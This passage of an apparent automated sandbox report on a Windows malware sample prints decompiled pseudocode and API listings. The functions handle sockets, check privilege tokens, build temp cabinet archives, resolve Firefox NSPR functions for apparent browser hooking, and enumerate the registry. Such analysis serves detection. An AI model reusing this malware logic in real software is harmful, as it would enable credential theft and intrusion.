Associated: 00000000.00000002.200956781.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.201020494.000000000042D000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.201038570.0000000000430000.00000002.00020000.sdmp Download File

Similarity

API ID: Token$AuthorityHeapInformation$AllocCloseCountErrorFreeHandleLastOpenProcess
String ID:
API String ID: 1378796458-0
Opcode ID: df6bd0e676c3087d85eb3a086132e59f16c08b436c1e599be8fce4425e30eafd
Instruction ID: ae87eb89dce42ec5114923362b6b417fbdc31672980f19e300e35729d63cc19d
Opcode Fuzzy Hash: df6bd0e676c3087d85eb3a086132e59f16c08b436c1e599be8fce4425e30eafd
Instruction Fuzzy Hash: 6B21F1713483016FE6209F24EE84FE737A8EB94750F04482AF480E72A0D778F880CB68

Uniqueness

Uniqueness Score: -1.00%

Function 00406F20, Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 108
networkCOMMON

Download Yara Rule

C-Code - Quality: 31%

			E00406F20(intOrPtr _a4) {
				char _v262;
				char _v277;
				signed char _v278;
				char _v295;
				char _v308;
				signed char _v311;
				char _v324;
				signed char _v325;
				signed char _v327;
				void* __esi;
				char* _t17;
				signed int _t20;
				signed int _t21;
				signed char _t23;
				void* _t31;
				void* _t35;
				intOrPtr _t36;
				void* _t39;
				char* _t41;
				char* _t42;
				char* _t43;
				void* _t44;
				signed int _t46;
				signed int _t47;
				signed int _t48;
				signed int _t50;

				_t36 = _a4;
				_t17 =  &_v262;
				__imp__#16(_t36, _t17, 1, 0, _t39, _t44, _t35);
				if(_t17 != 1) {
					L21:
					if(_t36 != 0xffffffff) {
						__imp__#22(_t36, 2);
						__imp__#3(_t36);
					}
					return 0;
				}
				_t20 = _v278 & 0x000000ff;
				if(_t20 == 0) {
					_t46 = 1;
					_t41 =  &_v277;
					while(1) {
						__imp__#16(_t36, _t41, _t46, 0);
						__eflags = _t20;
						if(_t20 <= 0) {
							goto L21;
						}
						_t46 = _t46 - _t20;
						_t41 = _t41 + _t20;
						__eflags = _t46;
						if(__eflags > 0) {
							continue;
						}
						_t21 = _t20 & 0xffffff00 | __eflags == 0x00000000;
						__eflags = _t21;
						if(_t21 == 0) {
							goto L21;
						}
						_t47 = 1;
						_t42 =  &_v295;
						while(1) {
							__imp__#16(_t36, _t42, _t47, 0);
							__eflags = _t21;
							if(_t21 <= 0) {
								goto L21;
							}
							_t47 = _t47 - _t21;
							_t42 = _t42 + _t21;
							__eflags = _t47;
							if(__eflags > 0) {
								continue;
							}
							if(__eflags == 0) {
								goto L21;
							}
							_t23 = _v311;
							__eflags = _t23;
							if(_t23 == 0) {
								goto L21;
							}
							_t48 = _t23 & 0x000000ff;
							_t43 =  &_v308;
							while(1) {
								__imp__#16(_t36, _t43, _t48, 0);
								__eflags = _t23;
								if(_t23 <= 0) {
									goto L21;
								}
								_t48 = _t48 - _t23;
								_t43 = _t43 + _t23;
								__eflags = _t48;
								if(__eflags > 0) {
									continue;
								}
								if(__eflags != 0) {
									_t50 = E00410AA0( &_v324, 0xfde9, _v327 & 0x000000ff);
									__eflags = _t50;
									if(_t50 != 0) {
										E0041EEC0(_v325 & 0x000000ff, _t50, _t36);
										E004107C0(_t50);
									}
								}
								goto L21;
							}
							goto L21;
						}
						goto L21;
					}
				} else {
					_t31 = _t20 - 4;
					if(_t31 == 0) {
						E00409910(_t36);
					} else {
						if(_t31 == 1) {
							E00408E30(_t36);
						}
					}
				}
			}

0x00406f2d
0x00406f36
0x00406f3c
0x00406f45
0x00407028
0x0040702b
0x00407030
0x00407037
0x00407037
0x00407045
0x00407045
0x00406f50
0x00406f53
0x00406f77
0x00406f7c
0x00406f80
0x00406f85
0x00406f8b
0x00406f8d
0x00000000
0x00000000
0x00406f93
0x00406f95
0x00406f97
0x00406f99
0x00000000
0x00000000
0x00406f9b
0x00406f9e
0x00406fa0
0x00000000
0x00000000
0x00406fa6
0x00406fab
0x00406faf
0x00406fb4
0x00406fba
0x00406fbc
0x00000000
0x00000000
0x00406fbe
0x00406fc0
0x00406fc2
0x00406fc4
0x00000000
0x00000000
0x00406fcb
0x00000000
0x00000000
0x00406fcd
0x00406fd1
0x00406fd3
0x00000000
0x00000000
0x00406fd5
0x00406fd8
0x00406fdc
0x00406fe1
0x00406fe7
0x00406fe9
0x00000000
0x00000000
0x00406feb
0x00406fed
0x00406fef
0x00406ff1
0x00000000
0x00000000
0x00406ff8
0x0040700e
0x00407010
0x00407012
0x0040701c
0x00407023
0x00407023
0x00407012
0x00000000
0x00406ff8
0x00000000
0x00406fdc
0x00000000
0x00406faf
0x00406f55
0x00406f55
0x00406f58
0x00406f6d
0x00406f5a
0x00406f5b
0x00406f62
0x00406f62
0x00406f5b
0x00406f58

APIs

recv.WS2_32(?,?,00000001,00000000), ref: 00406F3C
recv.WS2_32(?,?,00000001,00000000), ref: 00406F85
recv.WS2_32(?,?,00000001,00000000), ref: 00406FB4
recv.WS2_32(?,?,00000001,00000000), ref: 00406FE1

Part of subcall function 00408E30: getsockname.WS2_32 ref: 00408E57
Part of subcall function 00408E30: send.WS2_32(?,?,00000002,00000000), ref: 00408EF2

shutdown.WS2_32(?,00000002), ref: 00407030
closesocket.WS2_32(?), ref: 00407037

Strings

p0u, xrefs: 00407037

Memory Dump Source

Source File: 00000000.00000002.200969767.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.200956781.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.201020494.000000000042D000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.201038570.0000000000430000.00000002.00020000.sdmp Download File

Similarity

API ID: recv$closesocketgetsocknamesendshutdown
String ID: p0u
API String ID: 2777429208-1742372003
Opcode ID: 4f0bb9fb1971ebb8521124b14128867041905cb79a610c5a8e4cce7cf11735e6
Instruction ID: c4e9ea77dc09e803a742c966447b88960b81782aaae1152bd9aa7b2bb713588a
Opcode Fuzzy Hash: 4f0bb9fb1971ebb8521124b14128867041905cb79a610c5a8e4cce7cf11735e6
Instruction Fuzzy Hash: CA314E7790432136D33056351D04FAB2A9C9B82751F450A3AF985FB3D1C63DD94A83DE

Uniqueness

Uniqueness Score: -1.00%

Function 0040F100, Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 104
libraryloaderCOMMON

Download Yara Rule

C-Code - Quality: 53%

			E0040F100(void* __eflags, intOrPtr _a4, intOrPtr _a8) {
				intOrPtr _v12;
				intOrPtr _v16;
				char _v28;
				char _v52;
				char _v72;
				char _v88;
				struct HINSTANCE__* _v92;
				_Unknown_base(*)()* _v100;
				char _v104;
				char _v108;
				intOrPtr _v116;
				intOrPtr _v120;
				intOrPtr _v124;
				intOrPtr _v128;
				intOrPtr _v140;
				void* __edi;
				void* __esi;
				struct HINSTANCE__* _t27;
				intOrPtr _t39;
				intOrPtr _t43;
				intOrPtr* _t47;
				intOrPtr _t56;
				CHAR* _t59;
				CHAR* _t60;
				CHAR* _t61;
				void* _t62;
				WCHAR* _t63;
				void* _t65;
				struct HINSTANCE__* _t66;
				_Unknown_base(*)()* _t67;

				_t63 =  &_v28;
				E00424100(0xdd, _t63);
				_t27 = LoadLibraryW(_t63);
				_t66 = _t27;
				_v92 = _t66;
				if(_t66 == 0) {
					return _t27;
				}
				_t59 =  &_v52;
				E004240C0(0xde, _t59);
				_t47 = GetProcAddress(_t66, _t59);
				_t60 =  &_v88;
				E004240C0(0xdf, _t60);
				_v100 = GetProcAddress(_t66, _t60);
				_t61 =  &_v72;
				E004240C0(0xe0, _t61);
				_t67 = GetProcAddress(_t66, _t61);
				if(_t47 == 0 || _v100 == 0 || _t67 == 0) {
					L15:
					return FreeLibrary(_v92);
				} else {
					_t39 = E004129B0(L"SeTcbPrivilege");
					__imp__WTSGetActiveConsoleSessionId();
					_v100 = _t39;
					if(_t39 != 0xffffffff) {
						_push(_a8);
						_push(_a4);
						E0040F090(_t39, _t67);
					}
					_push( &_v104);
					_push( &_v108);
					_push(1);
					_push(0);
					_push(0);
					if( *_t47() == 0) {
						goto L15;
					} else {
						_t56 = _v128;
						_t62 = 0;
						if(_v124 <= 0) {
							L14:
							_v120(_t56);
							goto L15;
						}
						_t65 = 0;
						do {
							_t16 = _t56 + 8; // 0xaa3b620a
							_t43 =  *((intOrPtr*)(_t65 + _t16));
							if(_t43 == 0 || _t43 == 4) {
								_t52 =  *((intOrPtr*)(_t65 + _t56));
								if( *((intOrPtr*)(_t65 + _t56)) != _v116) {
									_push(_v12);
									_push(_v16);
									E0040F090(_t52, _t67);
									_t56 = _v140;
								}
							}
							_t62 = _t62 + 1;
							_t65 = _t65 + 0xc;
						} while (_t62 < _v124);
						goto L14;
					}
				}
			}

0x0040f107
0x0040f110
0x0040f118
0x0040f11e
0x0040f120
0x0040f126
0x0040f237
0x0040f237
0x0040f12c
0x0040f135
0x0040f146
0x0040f148
0x0040f151
0x0040f15c
0x0040f160
0x0040f169
0x0040f174
0x0040f178
0x0040f225
0x00000000
0x0040f191
0x0040f196
0x0040f19b
0x0040f1a1
0x0040f1a8
0x0040f1b8
0x0040f1b9
0x0040f1bd
0x0040f1bd
0x0040f1c6
0x0040f1cb
0x0040f1cc
0x0040f1ce
0x0040f1d0
0x0040f1d6
0x00000000
0x0040f1d8
0x0040f1d8
0x0040f1dc
0x0040f1e2
0x0040f220
0x0040f221
0x00000000
0x0040f221
0x0040f1e4
0x0040f1e6
0x0040f1e6
0x0040f1e6
0x0040f1ec
0x0040f1f3
0x0040f1fa
0x0040f20a
0x0040f20b
0x0040f20d
0x0040f212
0x0040f212
0x0040f1fa
0x0040f216
0x0040f217
0x0040f21a
0x00000000
0x0040f1e6
0x0040f1d6

APIs

LoadLibraryW.KERNEL32(?,?,?,00000000,00000000), ref: 0040F118
GetProcAddress.KERNEL32(00000000,?), ref: 0040F144
GetProcAddress.KERNEL32(00000000,?), ref: 0040F15A
GetProcAddress.KERNEL32(00000000,?), ref: 0040F172
FreeLibrary.KERNEL32(?,?,00000016,?,?,00000000), ref: 0040F22A

Part of subcall function 004129B0: GetCurrentThread.KERNEL32 ref: 004129BD
Part of subcall function 004129B0: OpenThreadToken.ADVAPI32(00000000), ref: 004129C4
Part of subcall function 004129B0: OpenProcessToken.ADVAPI32(000000FF,00000020,?), ref: 004129D7

WTSGetActiveConsoleSessionId.KERNEL32(SeTcbPrivilege,?,?,?,?,?,?,?,?,?,00410118,?,?,?,?,00000000), ref: 0040F19B

Part of subcall function 0040F090: EqualSid.ADVAPI32(00000000,?,?,00000000), ref: 0040F0BA
Part of subcall function 0040F090: HeapFree.KERNEL32(?,00000000,00000000,?,00000000), ref: 0040F0DC
Part of subcall function 0040F090: CloseHandle.KERNEL32(?,?,00000000), ref: 0040F0E7

Strings

SeTcbPrivilege, xrefs: 0040F191

Memory Dump Source

Source File: 00000000.00000002.200969767.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.200956781.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.201020494.000000000042D000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.201038570.0000000000430000.00000002.00020000.sdmp Download File

Similarity

API ID: AddressProc$FreeLibraryOpenThreadToken$ActiveCloseConsoleCurrentEqualHandleHeapLoadProcessSession
String ID: SeTcbPrivilege
API String ID: 1519699699-1502394177
Opcode ID: c5759dd7a02fd55d0c3d2346e41300c66d7581252512014568da169ab7a21c23
Instruction ID: 6255a01f1a711ebcf4452ad06ba08e693cf7b1a17a16bc28e3e9621f36853e5e
Opcode Fuzzy Hash: c5759dd7a02fd55d0c3d2346e41300c66d7581252512014568da169ab7a21c23
Instruction Fuzzy Hash: 17319235604301ABD230EBA5D845B6B77E9EFC4304F04493EF985B7681DA79EC098BA6

Uniqueness

Uniqueness Score: -1.00%

Function 00415FD0, Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 88
memoryCOMMON

Download Yara Rule

C-Code - Quality: 87%

			E00415FD0(WCHAR* _a4) {
				void* _t19;
				void* _t28;
				void _t30;
				void* _t40;

				if(E00415F00() == 0) {
					return 0;
				} else {
					_t40 = HeapAlloc( *0x42e6d4, 8, 0x954);
					if(_t40 == 0) {
						L7:
						 *0x42e6e4 =  *0x42e6e4 - 1;
						if( *0x42e6e4 == 0) {
							FreeLibrary( *0x42e6e0);
							_t19 =  *0x42d48c; // 0x0
							HeapDestroy(_t19);
						}
						return 0;
					} else {
						_t2 = _t40 + 0x53e; // 0x53e
						if(PathCombineW(_t2, _a4, 0) == 0) {
							L6:
							HeapFree( *0x42e6d4, 0, _t40);
							goto L7;
						} else {
							_t3 = _t40 + 0x746; // 0x746
							if((GetTempPathW(0x103, _t3) & 0xffffff00 | _t24 != 0x00000000) == 0) {
								goto L6;
							} else {
								_t6 = _t40 + 0x132; // 0x132
								_t7 = _t40 + 0x10; // 0x10
								 *_t7 = 0x7fffffff;
								 *((intOrPtr*)(_t40 + 0x14)) = 0x7fffffff;
								 *((intOrPtr*)(_t40 + 0x24)) = 1;
								 *((intOrPtr*)(_t40 + 0x28)) = 1;
								E00410820(_t6, "cabinet.dll", 0xc);
								_t11 = _t40 + 0x232; // 0x232
								_t28 = E00410820(_t11, "?O", 2);
								_t12 = _t40 + 4; // 0x4
								_t30 =  *0x42dd0c(_t12, E00415E20, E00415860, E00415880, E00415B50, E00415BA0, E00415BE0, E00415C40, E00415C90, E00415CF0, E00415D50, _t28, _t40);
								 *_t40 = _t30;
								if(_t30 == 0) {
									goto L6;
								} else {
									return _t40;
								}
							}
						}
					}
				}
			}

0x00415fda
0x00416105
0x00415fe0
0x00415ff4
0x00415ff8
0x004160da
0x004160da
0x004160e0
0x004160e9
0x004160ef
0x004160f5
0x004160f5
0x004160ff
0x00415ffe
0x00416004
0x00416013
0x004160ca
0x004160d4
0x00000000
0x00416019
0x00416019
0x00416032
0x00000000
0x00416038
0x0041603f
0x00416045
0x00416049
0x0041604f
0x00416056
0x0041605d
0x00416064
0x00416070
0x00416077
0x004160ab
0x004160b4
0x004160bd
0x004160c1
0x00000000
0x004160c3
0x004160c7
0x004160c7
0x004160c1
0x00416032
0x00416013
0x00415ff8

APIs

Part of subcall function 00415F00: LoadLibraryA.KERNEL32(cabinet.dll,00415FD8,00000000,004162CF,?,74B5FBB0,00000000,?,?,00000001), ref: 00415F12
Part of subcall function 00415F00: GetProcAddress.KERNEL32(00000000,FCICreate), ref: 00415F32
Part of subcall function 00415F00: GetProcAddress.KERNEL32(?,FCIAddFile), ref: 00415F44
Part of subcall function 00415F00: GetProcAddress.KERNEL32(?,FCIFlushCabinet), ref: 00415F57
Part of subcall function 00415F00: GetProcAddress.KERNEL32(?,FCIDestroy), ref: 00415F6A
Part of subcall function 00415F00: HeapCreate.KERNEL32(00000000,00080000,00000000,00000001), ref: 00415F9A
Part of subcall function 00415F00: FreeLibrary.KERNEL32(?,00000001), ref: 00415FAF

HeapAlloc.KERNEL32(?,00000008,00000954,?,00000000,004162CF,?,74B5FBB0,00000000,?,?,00000001), ref: 00415FEE
PathCombineW.SHLWAPI(0000053E,?,00000000,?,00000001), ref: 0041600B
GetTempPathW.KERNEL32(00000103,00000746,?,00000001), ref: 00416025
HeapFree.KERNEL32(?,00000000,00000000,?,00000001), ref: 004160D4
FreeLibrary.KERNEL32(?,?,00000001), ref: 004160E9
HeapDestroy.KERNEL32(00000000,?,00000001), ref: 004160F5

Strings

cabinet.dll, xrefs: 0041603A

Memory Dump Source

Source File: 00000000.00000002.200969767.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.200956781.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.201020494.000000000042D000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.201038570.0000000000430000.00000002.00020000.sdmp Download File

Similarity

API ID: AddressHeapProc$FreeLibrary$Path$AllocCombineCreateDestroyLoadTemp
String ID: cabinet.dll
API String ID: 4238409910-741892446
Opcode ID: 50142924199a26df4002a71b62eeb0398048c5d5f1fabf5a18f9a05558139dff
Instruction ID: c0fff5e9b443304ac0cd5daf90cc3cc83c7b18b5b5ed0e1af6bf9147383984e6
Opcode Fuzzy Hash: 50142924199a26df4002a71b62eeb0398048c5d5f1fabf5a18f9a05558139dff
Instruction Fuzzy Hash: 0721C371341B00EBD220DF619C49FD777ACEB58B15F90852AB645A61D0C7B8E485CB6C

Uniqueness

Uniqueness Score: -1.00%

Function 004181D0, Relevance: 12.3, APIs: 5, Strings: 2, Instructions: 72
fileCOMMON

Download Yara Rule

C-Code - Quality: 90%

			E004181D0(WCHAR* __edi) {
				void* __esi;
				long _t9;
				void* _t10;
				void* _t11;
				signed int _t12;
				void* _t14;
				WCHAR* _t20;
				WCHAR* _t23;
				WCHAR* _t24;
				void* _t25;
				void* _t26;

				_t23 = __edi;
				if(GetTempPathW(0xf6, _t26 + 0x214) - 1 > 0xf5) {
					L12:
					return 0;
				} else {
					_t25 = 0;
					while(1) {
						_t9 = GetTickCount();
						if(_t9 !=  *0x42dd08) {
							 *0x42dd08 = _t9;
							E00412320(_t9);
						}
						_t10 = E00412360();
						_push( *((intOrPtr*)(_t26 + 0x420)));
						_push(_t10);
						_push(L"tmp");
						_t24 = _t26 + 0x1c;
						_t11 = E00411D10(_t10, 0x104, _t24, L"%s%08x.%s");
						_t26 = _t26 + 0x10;
						if(_t11 == 0xffffffff) {
							goto L12;
						}
						_t20 = _t24;
						while(1) {
							_t12 =  *_t20 & 0x0000ffff;
							if(_t12 != 0x5c && _t12 != 0x2f) {
								break;
							}
							_t20 =  &(_t20[1]);
						}
						if(PathCombineW(_t23, _t26 + 0x218, _t20) == 0) {
							L11:
							_t25 = _t25 + 1;
							if(_t25 < 0x64) {
								continue;
							} else {
								goto L12;
							}
						} else {
							_t14 = CreateFileW(_t23, 0x40000000, 1, 0, 2, 0x80, 0);
							if(_t14 != 0xffffffff) {
								CloseHandle(_t14);
								return 1;
							} else {
								goto L11;
							}
						}
						goto L14;
					}
					goto L12;
				}
				L14:
			}

0x004181d0
0x004181f2
0x00418294
0x0041829d
0x004181f8
0x004181fe
0x00418200
0x00418200
0x0041820c
0x0041820e
0x00418213
0x00418213
0x00418218
0x00418224
0x00418225
0x00418226
0x00418235
0x00418239
0x0041823e
0x00418244
0x00000000
0x00000000
0x00418246
0x00418248
0x00418248
0x0041824e
0x00000000
0x00000000
0x00418255
0x00418255
0x0041826c
0x00418288
0x00418288
0x0041828c
0x00000000
0x00000000
0x00000000
0x00000000
0x0041826e
0x00418281
0x00418286
0x004182a1
0x004182b2
0x00000000
0x00000000
0x00000000
0x00418286
0x00000000
0x0041826c
0x00000000
0x00418200
0x00000000

APIs

GetTempPathW.KERNEL32(000000F6,?,?,?,00000000), ref: 004181E6
GetTickCount.KERNEL32 ref: 00418200
PathCombineW.SHLWAPI(?,?,?,?,?,?,00000000), ref: 00418264
CreateFileW.KERNEL32(?,40000000,00000001,00000000,00000002,00000080,00000000,?,?,?,00000000), ref: 00418281
CloseHandle.KERNEL32(00000000,?,?,?,00000000), ref: 004182A1

Strings

tmp, xrefs: 00418226
%s%08x.%s, xrefs: 0041822B

Memory Dump Source

Source File: 00000000.00000002.200969767.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.200956781.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.201020494.000000000042D000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.201038570.0000000000430000.00000002.00020000.sdmp Download File

Similarity

API ID: Path$CloseCombineCountCreateFileHandleTempTick
String ID: %s%08x.%s$tmp
API String ID: 4078759487-234517578
Opcode ID: b9979ec4bb5e81f5d117cb211a9ae66096ab21a0a85d4f71bfa598fcfc0145e4
Instruction ID: 7a861d23faf8b3bcd23b63f5ccf9a0c5b85c7030d134e78214f4e93367ce35f7
Opcode Fuzzy Hash: b9979ec4bb5e81f5d117cb211a9ae66096ab21a0a85d4f71bfa598fcfc0145e4
Instruction Fuzzy Hash: 5B117B716806046BE6306760BC86FFB3358E751714F200A7FF721E51E0DA7D98C5922D

Uniqueness

Uniqueness Score: -1.00%

Function 00413580, Relevance: 12.3, APIs: 5, Strings: 2, Instructions: 68
librarymemoryloaderCOMMON

Download Yara Rule

C-Code - Quality: 72%

			E00413580() {
				char _v1024;
				char _v1028;
				char _v1036;
				intOrPtr _v1040;
				_Unknown_base(*)()* _t16;
				intOrPtr _t19;
				void* _t20;
				void* _t23;
				struct HINSTANCE__* _t29;
				void* _t30;
				void* _t31;
				void* _t33;

				_t33 =  &_v1028;
				_t30 = 0;
				_t29 = LoadLibraryA("urlmon.dll");
				if(_t29 == 0) {
					L13:
					return _t30;
				} else {
					_t16 = GetProcAddress(_t29, "ObtainUserAgentString");
					if(_t16 == 0) {
						L12:
						FreeLibrary(_t29);
						goto L13;
					} else {
						_push( &_v1028);
						_push( &_v1024);
						_push(0);
						_v1028 = 0x3ff;
						_v1024 = 0;
						if( *_t16() != 0) {
							goto L12;
						} else {
							_t19 = _v1040;
							if(_t19 > 0x3ff) {
								_t19 = 0x3ff;
								_v1040 = 0x3ff;
							}
							 *((char*)(_t33 + _t19 + 0xc)) = 0;
							_t31 = 0;
							if(_v1036 != 0) {
								do {
									_t31 = _t31 + 1;
								} while ( *((char*)(_t33 + _t31 + 0xc)) != 0);
							}
							_t12 = _t31 + 1; // 0x2
							_t20 = _t12;
							if(_t20 != 0) {
								_t23 = HeapAlloc( *0x42e6d4, 8, _t20 + 4);
								if(_t23 != 0) {
									_t23 = E00410820(_t23,  &_v1036, _t31);
								}
								_t30 = _t23;
								goto L12;
							} else {
								FreeLibrary(_t29);
								return _t20;
							}
						}
					}
				}
			}

0x00413580
0x0041358d
0x00413595
0x00413599
0x00413642
0x0041364b
0x0041359f
0x004135a5
0x004135ad
0x0041363a
0x0041363b
0x00000000
0x004135b3
0x004135b7
0x004135bc
0x004135bd
0x004135be
0x004135c6
0x004135cf
0x00000000
0x004135d1
0x004135d1
0x004135da
0x004135dc
0x004135e1
0x004135e1
0x004135e5
0x004135ea
0x004135f1
0x004135f3
0x004135f3
0x004135f4
0x004135f3
0x004135fb
0x004135fb
0x00413600
0x00413622
0x0041362a
0x00413633
0x00413633
0x00413638
0x00000000
0x00413602
0x00413605
0x00413615
0x00413615
0x00413600
0x004135cf
0x004135ad

APIs

LoadLibraryA.KERNEL32(urlmon.dll,?,?), ref: 0041358F
GetProcAddress.KERNEL32(00000000,ObtainUserAgentString), ref: 004135A5
FreeLibrary.KERNEL32(00000000), ref: 00413605
HeapAlloc.KERNEL32(?,00000008,-00000003), ref: 00413622
FreeLibrary.KERNEL32(00000000), ref: 0041363B

Strings

urlmon.dll, xrefs: 00413588
ObtainUserAgentString, xrefs: 0041359F

Memory Dump Source

Source File: 00000000.00000002.200969767.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.200956781.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.201020494.000000000042D000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.201038570.0000000000430000.00000002.00020000.sdmp Download File

Similarity

API ID: Library$Free$AddressAllocHeapLoadProc
String ID: ObtainUserAgentString$urlmon.dll
API String ID: 3978381411-2685262326
Opcode ID: 09a3acade8f6e9e06a4deae2a18632431d8e15a699d56f0f6077f93f958dadd1
Instruction ID: b645aff6767fdd94bfb2318ef4c2c2f56b2faf65e18607f4c825cce178e19c3b
Opcode Fuzzy Hash: 09a3acade8f6e9e06a4deae2a18632431d8e15a699d56f0f6077f93f958dadd1
Instruction Fuzzy Hash: 95110271A043416BE321DF69D848BABBADC9FD0B05F04843EF945E2251E738CA468799

Uniqueness

Uniqueness Score: -1.00%

Function 00415460, Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 67networkmemoryCOMMON

Download Yara Rule

APIs

socket.WS2_32(?,00000002,00000000), ref: 0041546B
WSAIoctl.WS2_32(00000000,48000016,00000000,00000000,?,00000000,?,00000000,00000000), ref: 00415498
WSAGetLastError.WS2_32(?,?,00000000,00004E23), ref: 0041549F
HeapAlloc.KERNEL32(?,00000008,?,?,?,00000000,00004E23), ref: 004154C0
WSAIoctl.WS2_32(00000000,48000016,00000000,00000000,00000000,?,?,00000000,00000000), ref: 004154E5
closesocket.WS2_32(00000000), ref: 004154F5

Strings

p0u, xrefs: 004154F5

Memory Dump Source

Source File: 00000000.00000002.200969767.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.200956781.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.201020494.000000000042D000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.201038570.0000000000430000.00000002.00020000.sdmp Download File

Similarity

API ID: Ioctl$AllocErrorHeapLastclosesocketsocket
String ID: p0u
API String ID: 1822668714-1742372003
Opcode ID: 812dc81ce5a78006a11da1ee681b641013d6790edc7987994e320644fec62e19
Instruction ID: cbaaac5ffdf5255b5dc68bbcd8357e0299889c8a9f5e31d2fd7cb7e42d9fa441
Opcode Fuzzy Hash: 812dc81ce5a78006a11da1ee681b641013d6790edc7987994e320644fec62e19
Instruction Fuzzy Hash: BC1106316002207FE230966D9C89FEB2A5CEBC5B70F000615F915E62D1DA34EC80C2A9

Uniqueness

Uniqueness Score: -1.00%

Function 00407930, Relevance: 12.3, APIs: 4, Strings: 3, Instructions: 33
libraryloaderCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E00407930(struct HINSTANCE__* __eax, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr _a16) {
				_Unknown_base(*)()* _t9;
				_Unknown_base(*)()* _t10;
				_Unknown_base(*)()* _t11;
				struct HINSTANCE__* _t13;
				struct HINSTANCE__* _t15;
				struct HINSTANCE__* _t16;

				_t16 = __eax;
				 *0x42d3e0 = 0;
				 *0x42d3e4 = 0;
				InitializeCriticalSection(0x42d3c4);
				 *0x42d3dc = _a4;
				 *0x42d3bc = _t16;
				 *0x42d3b8 = _a8;
				 *0x42d3e8 = _a12;
				 *0x42d3b4 = _a16;
				_t9 = GetProcAddress(_t16, "PR_GetNameForIdentity");
				_t13 =  *0x42d3bc; // 0x0
				 *0x42d3b0 = _t9;
				_t10 = GetProcAddress(_t13, "PR_SetError");
				_t15 =  *0x42d3bc; // 0x0
				 *0x42d3c0 = _t10;
				_t11 = GetProcAddress(_t15, "PR_GetError");
				 *0x42d3ac = _t11;
				return _t11;
			}

0x00407931
0x0040793a
0x0040793f
0x00407944
0x0040795b
0x00407964
0x00407971
0x00407977
0x0040797d
0x00407982
0x00407984
0x00407990
0x00407995
0x00407997
0x004079a3
0x004079a8
0x004079aa
0x004079b0

APIs

InitializeCriticalSection.KERNEL32(0042D3C4,00000000,0041E902,00000000,00000000,00000000,00000000,0042D348), ref: 00407944
GetProcAddress.KERNEL32(00000000,PR_GetNameForIdentity), ref: 00407982
GetProcAddress.KERNEL32(00000000,PR_SetError), ref: 00407995
GetProcAddress.KERNEL32(00000000,PR_GetError), ref: 004079A8

Strings

PR_GetNameForIdentity, xrefs: 00407956
PR_SetError, xrefs: 0040798A
PR_GetError, xrefs: 0040799D

Memory Dump Source

Source File: 00000000.00000002.200969767.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.200956781.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.201020494.000000000042D000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.201038570.0000000000430000.00000002.00020000.sdmp Download File

Similarity

API ID: AddressProc$CriticalInitializeSection
String ID: PR_GetError$PR_GetNameForIdentity$PR_SetError
API String ID: 2804437462-2578621715
Opcode ID: 7e1823dcd238c7ed10041aef1269a97375049c7b311e96669b3d6e82c84c42f8
Instruction ID: 0181c4a8ca72cfcf612dcfbf25d3113f9939aedb166866ab6e4c0ceaaaa8f364
Opcode Fuzzy Hash: 7e1823dcd238c7ed10041aef1269a97375049c7b311e96669b3d6e82c84c42f8
Instruction Fuzzy Hash: 350192B5F143509FC720DF69EC44A467BE4AB88750794893FA804D32A4D7749402CF4E

Uniqueness

Uniqueness Score: -1.00%

Function 00422050, Relevance: 12.2, APIs: 8, Instructions: 222
memoryregistryCOMMON

Download Yara Rule

C-Code - Quality: 92%

			E00422050() {
				void* __ebx;
				void* __esi;
				void* _t57;
				long _t79;
				intOrPtr _t84;
				void* _t90;
				void* _t93;
				void* _t96;
				void* _t126;
				int _t127;
				void* _t128;
				void* _t130;
				int _t137;
				void* _t139;
				void* _t142;
				void* _t143;

				E00410870(_t143 + 0x24, _t143 + 0x24, 0, 8);
				_t57 = HeapAlloc( *0x42e6d4, 8, 0xc20);
				_t93 = _t57;
				 *(_t143 + 0x18) = _t93;
				if(_t93 != 0) {
					 *((intOrPtr*)(_t143 + 0x2c)) = 0x80000001;
					 *((intOrPtr*)(_t143 + 0x30)) = 0x80000002;
					_t6 = _t93 + 0x3fc; // 0x3fc
					_t142 = _t6;
					E00424100(0x8a, _t143 + 0xb0);
					E00424100(0x8b, _t143 + 0x34);
					E00424100(0x8c, _t143 + 0x70);
					E00424100(0x8d, _t143 + 0x5c);
					E00424100(0x8e, _t143 + 0x48);
					_t127 = 0;
					 *(_t143 + 0x24) = 0;
					do {
						if(RegOpenKeyExW( *(_t143 + 0x2c + _t127 * 4), _t143 + 0xbc, 0, 8, _t143 + 0x10) == 0) {
							_t137 = 0;
							 *((intOrPtr*)(_t143 + 0x34)) = 0x104;
							if(RegEnumKeyExW( *(_t143 + 0x10), 0, _t143 + 0x11c, _t143 + 0x24, 0, 0, 0, 0) == 0) {
								do {
									 *((intOrPtr*)(_t143 + 0x34)) = _t137 + 1;
